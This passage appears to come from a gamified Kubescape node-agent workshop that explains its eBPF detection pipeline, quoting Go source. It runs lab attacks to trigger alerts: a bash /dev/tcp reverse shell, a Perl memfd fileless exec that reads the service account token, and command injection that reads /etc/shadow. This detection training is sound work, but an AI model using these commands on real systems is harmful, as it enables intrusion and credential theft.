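To make the check concrete, here is the same substring test in plain Go. It is an approximation of the CEL expression quoted above, written for illustration; `looksFileless` is a hypothetical name and the real rule is evaluated by the CEL engine, not by this function.

```go
package main

import (
	"fmt"
	"strings"
)

// looksFileless applies the substring test quoted above to an exepath.
// Plain-Go approximation of the CEL expression, for illustration only.
func looksFileless(exepath string) bool {
	return strings.Contains(exepath, "memfd")
}

func main() {
	for _, p := range []string{"memfd:pwned", "/usr/bin/cat", "/proc/self/fd/3"} {
		fmt.Println(p, looksFileless(p))
	}
}
```

Note that the literal string /proc/self/fd/3 does not contain "memfd", so a substring test like this one only matches when the reported exepath carries the memfd: name, as it does in the alert's path field.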



Bonus Quest: The Reverse Shell Serpent

A different monster lurks in the Scribe's Chamber. The Reverse Shell Serpent slithers through bash redirections that look innocent to simple process monitors --- but the Scribe's arg parser sees everything.

Before we hunt the Serpent, look at how the trace_exec gadget chains its operators. Each operator runs in priority order, transforming the raw eBPF data before the next one sees it:

The ExecOperator at priority 1 transforms raw bytes into structured data before the eventOperator at priority 50000 copies and dispatches the event.

Source code of exec.go

pkg/containerwatcher/v2/tracers/exec.go:56-69

et.gadgetCtx = gadgetcontext.New(ctx, execImageName,

gadgetcontext.WithDataOperators(

et.kubeManager, // K8s metadata

ocihandler.OciHandler,

NewExecOperator(), // priority 1: parse args

et.eventOperator(), // priority 50000: dispatch

),

)

Lower priority runs first so the Scribe always finishes parsing before the Messenger dispatches.
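The ordering rule can be sketched as a sort followed by a loop. The `operator` type and `runChain` function below are hypothetical stand-ins, not Inspektor Gadget types; only the two priority values are taken from the text.

```go
package main

import (
	"fmt"
	"sort"
)

// operator is a hypothetical stand-in for a gadget data operator:
// a name, a priority, and a transformation applied to the event.
type operator struct {
	name     string
	priority int
	apply    func(event string) string
}

// runChain sorts operators by ascending priority and applies them in order,
// so the operator with the lowest priority value sees the event first.
func runChain(ops []operator, event string) string {
	sorted := append([]operator(nil), ops...) // copy, keep the caller's slice intact
	sort.SliceStable(sorted, func(i, j int) bool {
		return sorted[i].priority < sorted[j].priority
	})
	for _, op := range sorted {
		event = op.apply(event)
	}
	return event
}

func main() {
	ops := []operator{
		{"eventOperator", 50000, func(e string) string { return "dispatched(" + e + ")" }},
		{"ExecOperator", 1, func(e string) string { return "parsed(" + e + ")" }},
	}
	fmt.Println(runChain(ops, "raw"))
}
```

Even though the dispatcher is registered first in this example, the parser wraps the raw event first because its priority value is lower.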

Challenge: Catch a live reverse shell from inside a pod.

Create the three terminals for the rev shell

You need three terminals. Terminal 1 watches the node-agent alerts. Terminal 2 catches the shell. Terminal 3 fires the exploit.

# Terminal 1 — watch alerts in real time

kubectl logs -n kubescape -l app=node-agent -c node-agent -f \

| jq -r 'select(.RuleID) | "\(.BaseRuntimeMetadata.timestamp) \(.RuleID) \(.message)"'

Start a listener on the dev machine (Terminal 2):

MY_IP=$(hostname -I | awk '{print $1}')

echo "Listening on $MY_IP:4444 ..."

nc -lvnp 4444

In Terminal 3, create the reverse shell from the Redis pod:

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis \

-o jsonpath='{.items[0].metadata.name}')

MY_IP=$(hostname -I | awk '{print $1}')

kubectl -n redis exec "$REDIS_POD" -- \

bash -c "bash -i >& /dev/tcp/$MY_IP/4444 0>&1"

In Terminal 2 you should see a bash prompt arrive --- you are now inside the Redis container. Try hostname, id, cat /var/run/secrets/kubernetes.io/serviceaccount/token. You are now watching what an attacker would execute after gaining a foothold.

In Terminal 1, R0001 fires immediately (amongst many R0003 alerts):

2026-03-13T19:15:14.054563529Z R0001 Unexpected process launched: bash with PID 124110

2026-03-13T19:15:14.049730148Z R0001 Unexpected process launched: bash with PID 124104

2026-03-13T19:16:30.665779638Z R0001 Unexpected process launched: hostname with PID 126718 #assuming you ran `hostname` inside the caught shell

What comes from Inspector Gadget (the eBPF tracer):

kubectl exec uses the container runtime (runc) to call execve("/usr/bin/bash", ["/usr/bin/bash", "-c", "bash -i >& /dev/tcp/172.16.0.2/4444 0>&1"]) inside the container. The eBPF probe writes the argv array into a ring buffer as null-terminated bytes:

Raw eBPF buffer (args field):

┌───────────────┬──┬────┬──┬──────────────────────────────────────────────┬──┐

│ /usr/bin/bash │\0│ -c │\0│ bash -i >& /dev/tcp/172.16.0.2/4444 0>&1 │\0│

└───────────────┴──┴────┴──┴──────────────────────────────────────────────┴──┘

arg[0] arg[1] arg[2] ← the FULL C2 target is right here
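Once the arguments are parsed, pulling the C2 target out of arg[2] is a small pattern match. The sketch below is a hypothetical helper (`c2Target` and the regular expression are illustrative, not a node-agent rule); it assumes the bash /dev/tcp/host/port redirection form shown above.

```go
package main

import (
	"fmt"
	"regexp"
)

// devTCP matches bash's /dev/tcp/<host>/<port> redirection target.
var devTCP = regexp.MustCompile(`/dev/tcp/([^/\s]+)/(\d+)`)

// c2Target returns host and port of the first argument that contains
// a /dev/tcp redirection; ok is false if none does.
func c2Target(args []string) (host, port string, ok bool) {
	for _, a := range args {
		if m := devTCP.FindStringSubmatch(a); m != nil {
			return m[1], m[2], true
		}
	}
	return "", "", false
}

func main() {
	args := []string{"/usr/bin/bash", "-c", "bash -i >& /dev/tcp/172.16.0.2/4444 0>&1"}
	host, port, ok := c2Target(args)
	fmt.Println(host, port, ok)
}
```

This only covers the one redirection style used in this quest; other reverse shell techniques would need their own patterns.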

Read the chain of alerts for the full C2 evidence, observing how the pcomm (parent command) tells you where the process was spawned/forked from:

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=100 | jq 'select(.RuleID == "R0001") '

Room 4: The Hall of Time

A vast hall dominated by a mechanical clock. Events arrive from every direction --- exec, open, DNS, HTTP --- each stamped with nanosecond precision. A brass sign reads: "None shall pass out of turn."

exec events ──┐

open events ──┤ ┌───────────────────────────────────┐

dns events ──┼────>│ OrderedEventQueue (min-heap) │

net events ──┤ │ │

fork events ──┘ │ priority = timestamp.UnixNano() │

│ │

│ ┌───┬───┬───┬───┬───┬───┐ │

│ │t=1│t=2│t=3│t=4│t=5│...│ │

│ └───┴───┴───┴───┴───┴───┘ │

│ ▲ oldest pops first │

└──────────────┬────────────────────┘

│

every 50ms ────┘

│

┌──────────────▼──────────────────────┐

│ eventProcessingLoop (ticker) │

│ processQueueBatch() → enrichAndPro │

└─────────────────────────────────────┘

The OrderedEventQueue is keyed by nanosecond wall-clock timestamps. Events from different eBPF probes can arrive out of order. The queue re-orders them.

The eventProcessingLoop in container_watcher.go drains the queue every 50 milliseconds. If the queue fills up, a fullQueueAlert channel triggers an immediate drain.



Quest: The Two Clocks --- Why R0001 Arrives 10-22 Seconds Before R0003

For our fileless exec, the execve("/proc/self/fd/3") event enters the queue with its nanosecond timestamp and waits at most 50ms before being popped.

Fire the (pseudo) exploit again and watch the timestamps closely:

Recreate the triggers of the pseudo attack

# Terminal 1 — watch alerts, capture timestamps

kubectl logs -n kubescape -l app=node-agent -c node-agent -f \

| jq -r 'select(.RuleID) | "\(.BaseRuntimeMetadata.timestamp) \(.RuleID) \(.message)"'

# Terminal 2 — fire the fileless exec

kubectl -n redis exec "$REDIS_POD" -- perl -e '

use strict; use warnings;

my $name = "pwned";

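my $fd = syscall(279, $name, 0); # 279 is memfd_create on arm64 (on x86_64 it is move_pages)

if ($fd < 0) { $fd = syscall(319, $name, 0); } # fall back to 319, memfd_create on x86_64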

die "memfd_create failed\n" if $fd < 0;

open(my $src, "<:raw", "/bin/cat") or die;

open(my $dst, ">&=", $fd) or die;

binmode $dst; my $buf;

while (read($src, $buf, 8192)) { print $dst $buf; }

close $src;

exec {"/proc/self/fd/$fd"} "cat",

"/var/run/secrets/kubernetes.io/serviceaccount/token";

'

You'll see something like:

17:12:18.988Z R0001 Unexpected process launched ← instant

17:12:18.987Z R0006 Unexpected service account token access ← instant

17:12:18.989Z R0001 Unexpected process launched ← instant

17:12:23.514Z R1005 Fileless execution detected ← instant

17:12:40.344Z R0003 Syscalls Anomalies in container ← ~9-22s later!

17:12:40.332Z R0003 Syscalls Anomalies in container ← ~9-22s later!

17:12:40.364Z R0003 Syscalls Anomalies in container ← ~9-22s later!

Why the gap? The two alert types use completely different eBPF gadgets with different collection models:

trace_exec (R0001, R1005) advise_seccomp (R0003)

┌──────────────────────────────────────┐ ┌──────────────────────────────────────────┐

│ model: per-event │ │ model: periodic batch │

│ │ │ │

│ │ │ syscalls accumulate in eBPF map (bitmap) │

│ │ │ ...up to 30 seconds... │

│ │ │ map-fetch-interval fires │

│ execve fires │ │ ↓ flush entire bitmap │

│ ↓ immediate │ │ │

│ Subscribe callback │ │ Subscribe callback │

│ ↓ <1ms │ │ ↓ decode 256-byte map │

│ OrderedEventQueue │ │ OrderedEventQueue │

│ ↓ ≤50ms │ │ ↓ ≤50ms │

│ Alert fires │ │ Alert fires │

│ │ │ │

│ total: ~100ms │ │ total: up to ~30s │

└──────────────────────────────────────┘ └──────────────────────────────────────────┘

The SyscallTracer loads the advise_seccomp gadget with a hardcoded 30-second map-fetch interval. Instead of emitting one event per syscall (which would be millions per second), it accumulates a 256-byte bitmap of which syscalls were used, then flushes the entire bitmap to userspace every 30 seconds.
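The accumulate-then-flush model is easy to sketch. In the Go example below, the 256-byte size follows the text, but the one-bit-per-syscall layout, the `syscallBitmap` type, and its methods are assumptions made for illustration; the gadget's actual map encoding may differ.

```go
package main

import "fmt"

// syscallBitmap records which syscall numbers were seen, one bit per syscall.
// The 256-byte size follows the text; the bit layout is an assumption of this sketch.
type syscallBitmap [256]byte

// mark sets the bit for syscall nr; out-of-range numbers are ignored.
func (b *syscallBitmap) mark(nr int) {
	if nr < 0 || nr >= len(b)*8 {
		return
	}
	b[nr/8] |= 1 << (nr % 8)
}

// flush returns the recorded syscall numbers in ascending order and clears the bitmap.
func (b *syscallBitmap) flush() []int {
	var seen []int
	for i, v := range b {
		for bit := 0; bit < 8; bit++ {
			if v&(1<<bit) != 0 {
				seen = append(seen, i*8+bit)
			}
		}
	}
	*b = syscallBitmap{}
	return seen
}

func main() {
	var b syscallBitmap
	for _, nr := range []int{319, 89, 319} {
		b.mark(nr) // repeated calls collapse into a single bit
	}
	fmt.Println(b.flush()) // what one periodic fetch would hand to userspace
	fmt.Println(b.flush()) // empty until new syscalls are marked
}
```

The trade-off is visible in the types: the bitmap can say that a syscall happened during the window, but not when or how often.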

Source code -- SyscallTracer uses 30s batch interval

pkg/containerwatcher/v2/tracers/syscall.go:68-71

params := map[string]string{

"operator.oci.ebpf.map-fetch-count": "0",

"operator.oci.ebpf.map-fetch-interval": "30s",

"operator.LocalManager.host": "true",

}

Compare with the ExecTracer which uses real-time Subscribe callbacks (no batching):

pkg/containerwatcher/v2/tracers/exec.go:113-116

d.Subscribe(func(source datasource.DataSource, data datasource.Data) error {

et.callback(&utils.DatasourceEvent{...}) // fires per-event

return nil

}, opPriority)

You now understand why the Timekeeper's clock has two speeds. The Exec Scribes deliver scrolls the instant they are written. The Syscall Scribes gather a day's worth of tallies and deliver them in a single sack every 30 seconds. Both enter the Hall of Time, but one arrives much later than the other.

Room 5 -- The Loremaster's Study

Room 5: The Loremaster's Study

An ancient sage sits surrounded by floating crystal orbs, each containing the family tree of a running process. When an event arrives, the Loremaster traces its lineage back to the container's init process. The event enters as a bare fact; it leaves as a story.

OrderedEventQueue EventEnricher

┌───────────────┐ enrichAndProcess ┌──────────────────────────────┐

│ EventEntry │ ───────────────────> │ EnrichedEvent { │

│ event │ │ Event: <original> │

│ containerID │ │ ProcessTree: redis-server │

│ processID │ │ └─ perl │

│ timestamp │ │ └─ cat(3) │

└───────────────┘ │ ContainerID: "9cd796..." │

│ Timestamp: <ns> │

│ PID: 51120 │

│ } │

└──────────────┬───────────────┘

│

┌────────────────┼────────────────┐

│ │ │

▼ ▼ ▼

ProfileMgr RuleManager MalwareMgr

(Room 6) (Room 8) (signatures)

The EventEnricher does two things:

- Reports the event to the process tree manager --- for exec events, this updates the in-memory process tree with the new process

- Retrieves the container's process tree --- for our Redis exploit, this produces:

redis-server → perl → cat (execve from /proc/self/fd/3)

The result is an EnrichedEvent that carries the original event, the process tree, container ID, timestamp, and PID.
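How a lineage like the one above falls out of parent links can be shown with a small Go sketch. The `proc` type, the `lineage` function, and the PIDs are hypothetical; the process tree manager in node-agent keeps richer state than this.

```go
package main

import (
	"fmt"
	"strings"
)

// proc is a hypothetical, minimal process record.
type proc struct {
	comm string
	ppid int
}

// lineage walks parent links from pid up to the first unknown parent
// and renders the chain root-first.
func lineage(procs map[int]proc, pid int) string {
	var chain []string
	seen := map[int]bool{} // guards against accidental cycles
	for {
		p, ok := procs[pid]
		if !ok || seen[pid] {
			break
		}
		seen[pid] = true
		chain = append([]string{p.comm}, chain...)
		pid = p.ppid
	}
	return strings.Join(chain, " → ")
}

func main() {
	// PIDs are made up for the example.
	procs := map[int]proc{
		1:  {"redis-server", 0},
		40: {"perl", 1},
		41: {"cat", 40},
	}
	fmt.Println(lineage(procs, 41))
}
```

Because exec, fork, and exit events keep the map current, the lookup at alert time is just a walk up the parent pointers.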

Source code -- EventEnricher.EnrichEvents builds the process tree

pkg/containerwatcher/v2/event_enricher.go:28-54

func (ee *EventEnricher) EnrichEvents(entry EventEntry) *ebpfevents.EnrichedEvent {

var processTree apitypes.Process

if isProcessTreeEvent(eventType) { // exec, fork, exit are process tree events

ee.processTreeManager.ReportEvent(eventType, event)

processTree, _ = ee.processTreeManager.GetContainerProcessTree(

entry.ContainerID, entry.ProcessID, false)

}

return &ebpfevents.EnrichedEvent{

Event: event,

ProcessTree: processTree,

ContainerID: entry.ContainerID,

Timestamp: entry.Timestamp,

PID: entry.ProcessID,

}

}

The Dispatch --- Fan-Out to Handlers

After enrichment, the event enters the worker pool and is dispatched by EventHandlerFactory.ProcessEvent() to all handlers registered for ExecveEventType:

enrichedEvent ──> workerPool.Invoke() ──> ProcessEvent()

│

handlers[ExecveEventType] = [

containerProfileManager, ← Room 6 (records "normal")

ruleManager, ← Room 8 (evaluates R1005)

malwareManager, ← signature scan

metrics, ← prometheus counters

rulePolicy ← policy validation

]

All five handlers receive the same EnrichedEvent. The profile manager records it (if still learning). The rule manager judges it (if learning is done). Both see the same exepath: "/proc/self/fd/3".

Source code -- Handler registration for exec events

pkg/containerwatcher/v2/event_handler_factory.go:224

ehf.handlers[utils.ExecveEventType] = []Manager{

containerProfileManager, ruleManager, malwareManager, metrics, rulePolicy,

}

ProcessEvent() iterates handlers and calls ReportEnrichedEvent() on each:

for _, handler := range handlers {

if enrichedHandler, ok := handler.(EnrichedEventReceiver); ok {

enrichedHandler.ReportEnrichedEvent(enrichedEvent)

}

}
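A runnable version of that fan-out, with stand-in types, might look like the sketch below. `Manager` and `EnrichedEventReceiver` reuse the names from the snippet above, but their definitions here are simplified assumptions (the event is reduced to a string), and `recorder` and `dispatch` are hypothetical.

```go
package main

import "fmt"

// Manager and EnrichedEventReceiver reuse names from the snippet above;
// these simplified definitions are assumptions for the sketch.
type Manager interface{}

type EnrichedEventReceiver interface {
	ReportEnrichedEvent(event string)
}

// recorder is a hypothetical handler that remembers what it received.
type recorder struct{ got []string }

func (r *recorder) ReportEnrichedEvent(event string) { r.got = append(r.got, event) }

// dispatch delivers the event to every handler that implements
// EnrichedEventReceiver and returns how many handlers accepted it.
func dispatch(handlers []Manager, event string) int {
	n := 0
	for _, h := range handlers {
		if r, ok := h.(EnrichedEventReceiver); ok {
			r.ReportEnrichedEvent(event)
			n++
		}
	}
	return n
}

func main() {
	a, b := &recorder{}, &recorder{}
	handlers := []Manager{a, "not a receiver", b}
	fmt.Println(dispatch(handlers, "/proc/self/fd/3"), a.got, b.got)
}
```

The type assertion is what lets one handler list mix managers that want enriched events with ones that do not: the latter are skipped rather than causing an error.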

Quest: See the process tree in the alert

After running the fileless exec from Unit 1, check the alert JSON:

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=2000 | grep "R1005" | head -1 | python3 -m json.tool

"RuntimeProcessDetails": {

"processTree": {

"pid": 25489,

"cmdline": "/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token",

"comm": "3",

"ppid": 9806,

"pcomm": "containerd-shim",

"uid": 999,

"gid": 999,

"path": "memfd:pwned"

},



Side Quest: The Command Injector

A trapped chest sits in the corner of the Study. Its lock accepts any string — even one laced with poison.

Challenge: Deploy a vulnerable webapp, inject ; cat /etc/shadow, and watch the Loremaster's process tree expose the attack chain.

Install the infamous webapp

Step 1 — Apply the ApplicationProfile (SBoB)

Instead of waiting for a learning period, we supply a pre-built ApplicationProfile. The profile must exist before the pod starts so the node-agent finds it.

kubectl create namespace webapp

kubectl apply -f - <<'EOF'

apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
kind: ApplicationProfile
metadata:
  name: webapp-profile-wildcard
  namespace: webapp
spec:
  architectures:
  - amd64
  containers:
  - capabilities:
    - CAP_DAC_OVERRIDE
    - CAP_SETGID
    - CAP_SETUID
    endpoints: null
    execs:
    - args:
      - /usr/bin/dirname
      - /var/run/apache2
      path: /usr/bin/dirname
    - args:
      - /usr/bin/dirname
      - /var/lock/apache2
      path: /usr/bin/dirname
    - args:
      - /usr/bin/dirname
      - /var/log/apache2
      path: /usr/bin/dirname
    - args:
      - /bin/mkdir
      - -p
      - /var/run/apache2
      path: /bin/mkdir
    - args:
      - /usr/local/bin/apache2-foreground
      path: /usr/local/bin/apache2-foreground
    - args:
      - /bin/rm
      - -f
      - /var/run/apache2/apache2.pid
      path: /bin/rm
    - args:
      - /bin/mkdir
      - -p
      - /var/log/apache2
      path: /bin/mkdir
    - args:
      - /bin/mkdir
      - -p
      - /var/lock/apache2
      path: /bin/mkdir
    - args:
      - /usr/sbin/apache2
      - -DFOREGROUND
      path: /usr/sbin/apache2
    - args:
      - /usr/local/bin/docker-php-entrypoint
      - apache2-foreground
      path: /usr/local/bin/docker-php-entrypoint
    - args:
      - /usr/bin/touch
      - '*'
      path: /usr/bin/touch
    identifiedCallStacks: null
    imageID: ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b
    imageTag: ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b
    name: mywebapp-app
    opens:
    - flags:
      - O_APPEND
      - O_CLOEXEC
      - O_CREAT
      - O_DIRECTORY
      - O_EXCL
      - O_NONBLOCK
      - O_RDONLY
      - O_RDWR
      - O_WRONLY
      path: //var/www/html/*
    rulePolicies: {}
    seccompProfile:
      spec:
        defaultAction: ""
    syscalls:
    - accept4
    - access
    - arch_prctl
    - bind
    - brk
    - capget
    - capset
    - chdir
    - chmod
    - clone
    - close
    - close_range
    - connect
    - dup2
    - dup3
    - epoll_create1
    - epoll_ctl
    - epoll_pwait
    - execve
    - exit
    - exit_group
    - faccessat2
    - fcntl
    - fstat
    - fstatfs
    - futex
    - getcwd
    - getdents64
    - getegid
    - geteuid
    - getgid
    - getpgrp
    - getpid
    - getppid
    - getrandom
    - getsockname
    - gettid
    - getuid
    - ioctl
    - listen
    - lseek
    - mkdir
    - mmap
    - mprotect
    - munmap
    - nanosleep
    - newfstatat
    - openat
    - openat2
    - pipe
    - prctl
    - prlimit64
    - read
    - recvfrom
    - recvmsg
    - rename
    - rt_sigaction
    - rt_sigprocmask
    - rt_sigreturn
    - select
    - sendto
    - set_robust_list
    - set_tid_address
    - setgid
    - setgroups
    - setsockopt
    - setuid
    - sigaltstack
    - socket
    - stat
    - statfs
    - statx
    - sysinfo
    - tgkill
    - times
    - tkill
    - umask
    - uname
    - unknown
    - unlinkat
    - wait4
    - write
status: {}

EOF

Notice what's in the profile: dirname, mkdir, rm, touch, apache2, docker-php-entrypoint — the normal apache startup sequence. Crucially, sh and cat are not in the execs list. Any process outside this list triggers R0001.
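To make the allowlist idea concrete, here is a minimal sketch of the check behind "unexpected process launched". It is a simplified model, not the real rule: in node-agent the decision is made by the CEL RuleManager and may also take arguments into account. The execsInProfile set is hand-copied from the path values of the profile above, and unexpectedProcess is a hypothetical helper name.

```go
package main

import "fmt"

// execsInProfile holds the distinct execs[].path values from the
// webapp-profile-wildcard profile above.
var execsInProfile = map[string]bool{
	"/usr/bin/dirname":                     true,
	"/bin/mkdir":                           true,
	"/usr/local/bin/apache2-foreground":    true,
	"/bin/rm":                              true,
	"/usr/sbin/apache2":                    true,
	"/usr/local/bin/docker-php-entrypoint": true,
	"/usr/bin/touch":                       true,
}

// unexpectedProcess reports whether an exec path is absent from the profile.
func unexpectedProcess(path string) bool {
	return !execsInProfile[path]
}

func main() {
	for _, p := range []string{"/usr/sbin/apache2", "/bin/dash", "/bin/cat"} {
		fmt.Printf("%-20s unexpected=%v\n", p, unexpectedProcess(p))
	}
}
```

Only the two paths an attacker would need, the shell and cat, come back as unexpected.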

Step 2 — Deploy the webapp

Now that the profile exists, deploy the webapp. The kubescape.io/user-defined-profile: webapp-profile-wildcard label tells the node-agent to use our pre-built SBoB — detection starts the moment the container is ready.

kubectl apply -f - <<'EOF'

apiVersion: apps/v1
kind: Deployment
metadata:
  name: webapp-mywebapp
  namespace: webapp
  labels:
    app.kubernetes.io/name: mywebapp
    app.kubernetes.io/instance: webapp
spec:
  replicas: 1
  selector:
    matchLabels:
      app.kubernetes.io/name: mywebapp
      app.kubernetes.io/instance: webapp
  template:
    metadata:
      labels:
        app.kubernetes.io/name: mywebapp
        app.kubernetes.io/instance: webapp
        kubescape.io/user-defined-profile: webapp-profile-wildcard
    spec:
      serviceAccountName: default
      containers:
        - name: mywebapp-app
          image: "ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b"
          imagePullPolicy: Always
          ports:
            - name: http
              containerPort: 80
              protocol: TCP
          volumeMounts:
            - mountPath: /host/var/log
              name: nodelog
      volumes:
        - name: nodelog
          hostPath:
            path: /var/log
---
apiVersion: v1
kind: Service
metadata:
  name: webapp-mywebapp
  namespace: webapp
  labels:
    app.kubernetes.io/name: mywebapp
    app.kubernetes.io/instance: webapp
spec:
  type: ClusterIP
  ports:
    - port: 8080
      targetPort: 80
      protocol: TCP
      name: http
  selector:
    app.kubernetes.io/name: mywebapp
    app.kubernetes.io/instance: webapp

EOF

Wait for the pod to be ready:

kubectl -n webapp wait --for=condition=ready pod -l app.kubernetes.io/name=mywebapp --timeout=120s

Step 3 — Inject the command

The webapp has a ping feature that passes user input directly to a shell. Port-forward the pod's port 80 to localhost:8080 and inject ; cat /etc/shadow:

sudo kill -9 $(sudo lsof -t -i :8080) 2>/dev/null || true

kubectl --namespace webapp port-forward $(kubectl get pods --namespace webapp -l "app.kubernetes.io/name=mywebapp,app.kubernetes.io/instance=webapp" -o jsonpath="{.items[0].metadata.name}") 8080:80 &

curl "127.0.0.1:8080/ping.php?ip=1.1.1.1%3Bcat%20/etc/shadow"

You should not yet see the contents of /etc/shadow in the response: the injected command runs as the web server user (www-data, uid 33), which has no read access to /etc/shadow.
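Why does the shell run two commands? The sketch below decodes the query value from the curl call and builds the command line the way a naive ping handler might. The buildPingCommand helper is hypothetical; the "ping -c 4 " prefix is taken from the sh cmdline that appears in the alert's process tree, not from the webapp source.

```go
package main

import (
	"fmt"
	"net/url"
)

// buildPingCommand is a hypothetical stand-in for the vulnerable handler:
// it concatenates the user-supplied value into a shell command unescaped.
func buildPingCommand(ip string) string {
	return "ping -c 4 " + ip
}

// injectedCommand percent-decodes a raw query value and returns the
// command string that would be handed to /bin/sh -c.
func injectedCommand(rawValue string) (string, error) {
	ip, err := url.QueryUnescape(rawValue)
	if err != nil {
		return "", err
	}
	return buildPingCommand(ip), nil
}

func main() {
	cmd, err := injectedCommand("1.1.1.1%3Bcat%20/etc/shadow")
	if err != nil {
		panic(err)
	}
	fmt.Println(cmd) // ping -c 4 1.1.1.1;cat /etc/shadow
}
```

%3B decodes to a semicolon, which the shell treats as a command separator, so cat runs right after ping finishes.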

Step 4 — Read the alert

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=5000 | grep -E "R0001|R0010" | jq

Now let's grab /etc/shadow in a more brutal way:

WEBAPP_POD=$(kubectl get pods --namespace webapp -l "app.kubernetes.io/name=mywebapp,app.kubernetes.io/instance=webapp" -o jsonpath="{.items[0].metadata.name}")

kubectl exec -n webapp $WEBAPP_POD -- sh -c 'cat /etc/shadow'

Look for two rules firing:

- R0001 (Unexpected process launched): cat is not in the profile's execs list, so it is unexpected

- R0010 (Unexpected sensitive file access): /etc/shadow is a sensitive path that is not under /var/www/html

For /etc/shadow, a predefined rule tells us that this is a sensitive file and that cat has no business reading it.

In the injection case, the reconstructed process tree tells us more: an Apache server spawning sh, which in turn spawns cat, is malicious. View RuntimeProcessDetails.processTree in the alert:

"RuntimeProcessDetails": {

"processTree": {

"pid": 52414,

"cmdline": "apache2 -DFOREGROUND",

"comm": "apache2",

"ppid": 52187,

"pcomm": "containerd-shim",

"uid": 0,

"gid": 0,

"startTime": "0001-01-01T00:00:00Z",

"cwd": "/var/www/html",

"path": "/usr/sbin/apache2",

"childrenMap": {

"apache2␟52441": {

"pid": 52441,

"cmdline": "apache2 -DFOREGROUND",

"comm": "apache2",

"ppid": 52414,

"pcomm": "apache2",

"uid": 33,

"gid": 33,

"startTime": "0001-01-01T00:00:00Z",

"cwd": "/var/www/html",

"path": "/usr/sbin/apache2",

"childrenMap": {

"sh␟54441": {

"pid": 54441,

"cmdline": "/bin/sh -c ping -c 4 1.1.1.1;cat /etc/shadow",

"comm": "sh",

"ppid": 52441,

"pcomm": "apache2",

"uid": 33,

"gid": 33,

"startTime": "0001-01-01T00:00:00Z",

"path": "/bin/dash",

"childrenMap": {

"cat␟54449": {

"pid": 54449,

"cmdline": "/bin/cat /etc/shadow",

"comm": "cat",

"ppid": 54441,

"pcomm": "sh",

"uid": 33,

"gid": 33,

"startTime": "0001-01-01T00:00:00Z",

"path": "/bin/cat"

}

}

}

Cleanup — remove the webapp

kubectl delete namespace webapp

The Loremaster finishes his work. The execve event now carries its full lineage and Kubernetes identity. Copies are dispatched: one to the Archive for recording, another to the Inquisitor for judgment.

Room 6 -- The Great Archive


Massive filing cabinets stretch from floor to ceiling, one drawer for each container. A meticulous librarian sorts incoming events into labeled drawers. "If I have seen it before," she says, "it is normal. If I have not --- that is for the Inquisitor to decide."

The Profile Manager records every exec, endpoint, open, syscall, and capability observed by the Inspector Gadget-tracer during the learning period into an ApplicationProfile CRD.

#save this as bob.yaml

apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
kind: ApplicationProfile
metadata:
  name: bob
spec:
  architectures:
  - amd64
  containers:
  - name: redis
    capabilities: null
    endpoints: null
    execs: null
    opens: null
    syscalls: null
    rulePolicies: {}

It supports:

- Deduplication: redis-cli can be exec'd 1000 times; only one entry is recorded.

- Flag merging: If /etc/resolv.conf is opened first with O_RDONLY and then with O_WRONLY, the flags merge to [O_RDONLY, O_WRONLY].
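Both behaviors fall out naturally from set semantics. The following is a minimal sketch under that assumption; the profile type and its methods are hypothetical and far simpler than the real ProfileManager, which also tracks arguments, endpoints, syscalls, and capabilities.

```go
package main

import (
	"fmt"
	"sort"
)

// profile is a toy model of one container's drawer in the Archive.
type profile struct {
	execs map[string]struct{}            // set of exec'd paths
	opens map[string]map[string]struct{} // path -> set of open flags
}

func newProfile() *profile {
	return &profile{
		execs: map[string]struct{}{},
		opens: map[string]map[string]struct{}{},
	}
}

// recordExec is idempotent: repeated execs of the same path keep one entry.
func (p *profile) recordExec(path string) {
	p.execs[path] = struct{}{}
}

// recordOpen merges the given flags into the set already stored for path.
func (p *profile) recordOpen(path string, flags ...string) {
	set, ok := p.opens[path]
	if !ok {
		set = map[string]struct{}{}
		p.opens[path] = set
	}
	for _, f := range flags {
		set[f] = struct{}{}
	}
}

// openFlags returns the merged flags for path in sorted order.
func (p *profile) openFlags(path string) []string {
	out := make([]string, 0, len(p.opens[path]))
	for f := range p.opens[path] {
		out = append(out, f)
	}
	sort.Strings(out)
	return out
}

func main() {
	p := newProfile()
	for i := 0; i < 1000; i++ {
		p.recordExec("redis-cli")
	}
	p.recordOpen("/etc/resolv.conf", "O_RDONLY")
	p.recordOpen("/etc/resolv.conf", "O_WRONLY")

	fmt.Println(len(p.execs), p.openFlags("/etc/resolv.conf"))
	// 1 [O_RDONLY O_WRONLY]
}
```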

Out of the box, these profiles can be VERY long and overly specific. Let's look at some tricks to make them more robust.



Quest: Building a Bill of Behavior (APs, NNs, Signatures and RulePolicies)

1) Profile Dependency and RulePolicies

There are three types of rules:

By default, R1005 (Fileless execution detected) does NOT depend on an ApplicationProfile. It's a signature rule (a predefined Indicator of Compromise). The profile dependency is set to 2 (not required).

Let's walk through how you'd change that. We will now allowlist R1005 via a RulePolicy in the profile. Three things are needed, plus a restart to activate them:

A) Let's start with an empty ApplicationProfile and build a bill of behavior step by step

Save the YAML above as bob.yaml and attach it to the redis container by adding the label kubescape.io/user-defined-profile: bob to the redis pod.

kubectl apply -f bob.yaml -n redis

kubectl patch deployment redis -n redis --type merge -p '{"spec":{"template":{"metadata":{"labels":{"kubescape.io/user-defined-profile":"bob"}}}}}'

B) Enable supportPolicy on R1005 in the rules CRD

kubectl edit rules default-rules -n kubescape

Find the R1005 entry and change supportPolicy: false to supportPolicy: true:

- name: "Fileless execution detected"
  id: "R1005"
  ...
  supportPolicy: true

C) Add a rulePolicies stanza to the AP container spec

kubectl edit applicationprofiles.spdx.softwarecomposition.kubescape.io -n redis bob

rulePolicies:
  R1005:
    processAllowed:
    - "3"

Or to allowlist the entire container for R1005 (any fileless exec is okay):

rulePolicies:
  R1005:
    containerAllowed: true
